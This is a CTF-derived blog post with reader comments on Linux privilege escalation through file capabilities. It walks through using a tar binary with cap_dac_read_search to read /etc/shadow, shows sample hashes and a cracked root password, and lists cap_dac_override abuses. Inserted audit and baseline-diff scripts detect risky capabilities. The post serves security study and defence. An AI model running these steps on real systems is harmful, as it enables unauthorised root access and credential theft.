
An Interesting Privilege Escalation vector (getcap/setcap)

Posted on August 21, 2018 - February 16, 2019 by nxnjz

Introduction

I recently came across an interesting way of escalating privileges on a GNU/Linux system during a CTF challenge. It involves file/process capabilities.

In Linux, files may be given specific capabilities. For example, if an executable needs to read files that are only readable by root, it is possible to give that file just this ‘permission’ without having it run with complete root privileges. This allows for a more secure system in general. For more background on this subject, see the capabilities(7) manual page.

getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on Debian and Debian-based distributions.

Privilege Escalation

We start by scanning the file system for files with capabilities using getcap -r /. The -r flag tells getcap to search recursively, and / indicates that we want to search the whole system.

The output is usually filled with tens or hundreds of “Operation not supported” errors, making it hard to read. We can redirect stderr to /dev/null to get cleaner output.

nxnjz@test-machine:~$ getcap -r / 2>/dev/null
/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep
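Reading a long getcap listing by eye is error-prone, so here is a small audit helper that classifies that output. It is an added example, not code from the original post: it reads getcap -r output from stdin (both the older “path = caps” and the newer “path caps” formats), flags every file whose capability set contains one of the capabilities this post calls abusable, and demonstrates itself on a constructed sample built from the three lines above plus one made-up path (/opt/example/backup). The RISKY_CAPS policy list and the AUDIT_LIVE switch are assumptions of this example.

```shell
#!/bin/sh
# Added audit helper (not from the original post). Flags files whose
# capability set contains a capability considered abusable.
# Policy list is an assumption; extend it for your own environment.
RISKY_CAPS="cap_dac_read_search cap_dac_override"

# flag_risky_caps: stdin = output of `getcap -r / 2>/dev/null`
#                  stdout = one "RISKY <path> <caps>" line per flagged file
flag_risky_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}        # text before the first space is the path
        caps=${line#* }         # text after it is the capability set
        caps=${caps#= }         # older libcap prints "path = caps", newer "path caps"
        for c in $RISKY_CAPS; do
            case "$caps" in
                *"$c"*) printf 'RISKY %s %s\n' "$path" "$caps"; break ;;
            esac
        done
    done
}

# Constructed sample: the three lines from the post plus one newer-style
# line with an invented path, so the helper can be exercised offline.
SAMPLE_GETCAP='/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/opt/example/backup cap_dac_override=ep'

# Set AUDIT_LIVE=1 to scan the real file system (assumed switch); otherwise
# the constructed sample is used.
if [ "${AUDIT_LIVE:-0}" = "1" ]; then
    getcap -r / 2>/dev/null | flag_risky_caps
else
    printf '%s\n' "$SAMPLE_GETCAP" | flag_risky_caps
fi
```

On the sample this prints two RISKY lines (the tar binary from the post and the constructed backup binary) and stays silent about the gst-ptp-helper and mtr-packet entries, which carry network capabilities that this policy does not treat as file-access risks.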

An unusual finding: tar has the cap_dac_read_search capability. This capability bypasses file read permission checks and directory read/search permission checks, so the binary can read anything on the system. We could use this to read SSH keys, or /etc/shadow to get password hashes.

/etc/shadow is usually only readable by root:

nxnjz@test-machine:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

But since tar has that capability, we can archive /etc/shadow, extract it from the archive, and read it.

nxnjz@test-machine:~$ ls
tar
nxnjz@test-machine:~$ ./tar -cvf shadow.tar /etc/shadow
./tar: Removing leading `/' from member names
/etc/shadow
nxnjz@test-machine:~$ ls
shadow.tar tar
nxnjz@test-machine:~$ ./tar -xvf shadow.tar
etc/shadow
nxnjz@test-machine:~$ ls
etc shadow.tar tar
nxnjz@test-machine:~$ cat etc/shadow
root:$1$xyz$Bf.3hZ4SmETM3A78n1nWr.:17735:0:99999:7:::
daemon:*:17729:0:99999:7:::
bin:*:17729:0:99999:7:::
sys:*:17729:0:99999:7:::
sync:*:17729:0:99999:7:::
games:*:17729:0:99999:7:::
man:*:17729:0:99999:7:::
lp:*:17729:0:99999:7:::
mail:*:17729:0:99999:7:::
news:*:17729:0:99999:7:::
uucp:*:17729:0:99999:7:::
proxy:*:17729:0:99999:7:::
nxnjz:$1$sTfA$SnnNO9Cflvs4aq4ZCU/6J/:17764:0:99999:7:::

After cracking the root password hash, which turns out to be ‘root1234’, we can log in using su:

nxnjz@test-machine:~$ su root
Password:
root@test-machine:/home/nxnjz# whoami
root
root@test-machine:/home/nxnjz#

Conclusion & Mitigation

This is simply an example of how capabilities can serve as a privilege escalation vector. Another very useful capability in a scenario like this would be cap_dac_override, which bypasses discretionary access checks and so allows full read/write/execute access. This could obviously be used in various ways to escalate privileges, including but not limited to adding a root user to /etc/passwd or /etc/shadow, modifying cron jobs run by root, adding a public SSH key to /root/authorized_keys, or simply opening a root shell.

Keep in mind that the presence of a potentially exploitable capability does not guarantee privilege escalation. You’re still limited by the functionality of the executable in question.

That said, capabilities are rarely used in the wild; system administrators rarely set or change them.

System administrators should make sure that no abusable or exploitable capabilities are assigned on their file systems. Capabilities are generally safer than SUID, but they may still pose a risk.
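One practical way to act on that recommendation is to keep a baseline of the getcap -r output and report any file whose capability set appears or changes between scans, then strip the offending capability with setcap -r. The script below is an added example, not from the original post or the libcap project: caps_added prints every line of a current scan that is absent from the baseline, demo_caps_added exercises it on constructed baseline and current listings (the baseline is the post's listing without the tar entry), and the comment at the end shows the host-side commands. The baseline path /var/lib/caps.baseline is an assumption.

```shell
#!/bin/sh
# Added example (not from the original post): detect newly assigned or
# changed file capabilities by diffing a saved getcap baseline against a
# fresh scan, then remediate with setcap -r.

# caps_added BASELINE_FILE CURRENT_FILE
# Prints each line of CURRENT_FILE that does not occur verbatim in BASELINE_FILE.
# -F fixed strings, -x whole line, -v invert; grep exits 1 when nothing is
# printed, which is the "all clear" case here, not an error.
caps_added() {
    grep -Fxv -f "$1" "$2" || true
}

# Constructed sample listings: the baseline is the post's getcap output
# without the tar entry; the current scan includes it.
BASELINE_CAPS='/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep'
CURRENT_CAPS='/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep'

# demo_caps_added: runs caps_added on the constructed sample and prints
# the lines that would be reported to the administrator.
demo_caps_added() {
    tmp=$(mktemp -d)
    printf '%s\n' "$BASELINE_CAPS" > "$tmp/baseline"
    printf '%s\n' "$CURRENT_CAPS"  > "$tmp/current"
    caps_added "$tmp/baseline" "$tmp/current"
    rm -rf "$tmp"
}

demo_caps_added

# On a real host (as root), with /var/lib/caps.baseline as an assumed path:
#   getcap -r / 2>/dev/null | sort > /var/lib/caps.baseline   # record once, after review
#   getcap -r / 2>/dev/null | sort > /tmp/caps.now             # re-scan on a schedule
#   caps_added /var/lib/caps.baseline /tmp/caps.now            # report anything new
#   setcap -r /home/nxnjz/tar                                  # remove all capabilities from the file
#   getcap /home/nxnjz/tar                                     # prints nothing once they are gone
```

Sorting both listings keeps the comparison stable across scans, since getcap -r emits entries in file-system traversal order. A changed capability set shows up as a new line as well, because the whole "path = caps" line is compared.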

Posted in Privilege Escalation. Tagged getcap, linux, privesc.

10 Comments

  1. Shadow6 says:
    October 27, 2018 at 3:59 am

    Great write up. I appreciate this. Helped me get through a CTF on HTB. Thanks for the help!!

    Reply
    1. juntao says:
      November 13, 2018 at 4:20 pm

      hey me too, I think you talking about finding W htb.

      Good article, you are the man.

      Regards

      Reply
      1. quas says:
        November 24, 2018 at 5:50 am

        hehe, I found this writeup just after rooting W at htb.. would’ve helped xP

        Reply
  2. Bob Jones says:
    May 11, 2019 at 4:05 am

    Great Post

    Reply
  3. Pingback: Lightweight – Yekki's Blog
  4. wini says:
    September 12, 2019 at 6:11 am

    Interesting article! Thanks.

    Reply
  5. Pingback: Linux Privilege Escalation Checklist - NXNJZ
  6. sait says:
    October 5, 2020 at 8:12 am

    very simple and helpful. Thank you!

    Reply
  7. B1gD4Ddy says:
    June 21, 2021 at 9:35 am

    Great article author..this just helped me understand a new way of PrivEsc in linux..I had read abt this b4 but was always scratching my head to fully understand it..Now I know it all..Thanks to u. 🙂

    Reply
  8. Pingback: Writeup: HackTheBox Cap - Without Metasploit (OSCP Prep) - Learn from Tutorial - Abu Sayed
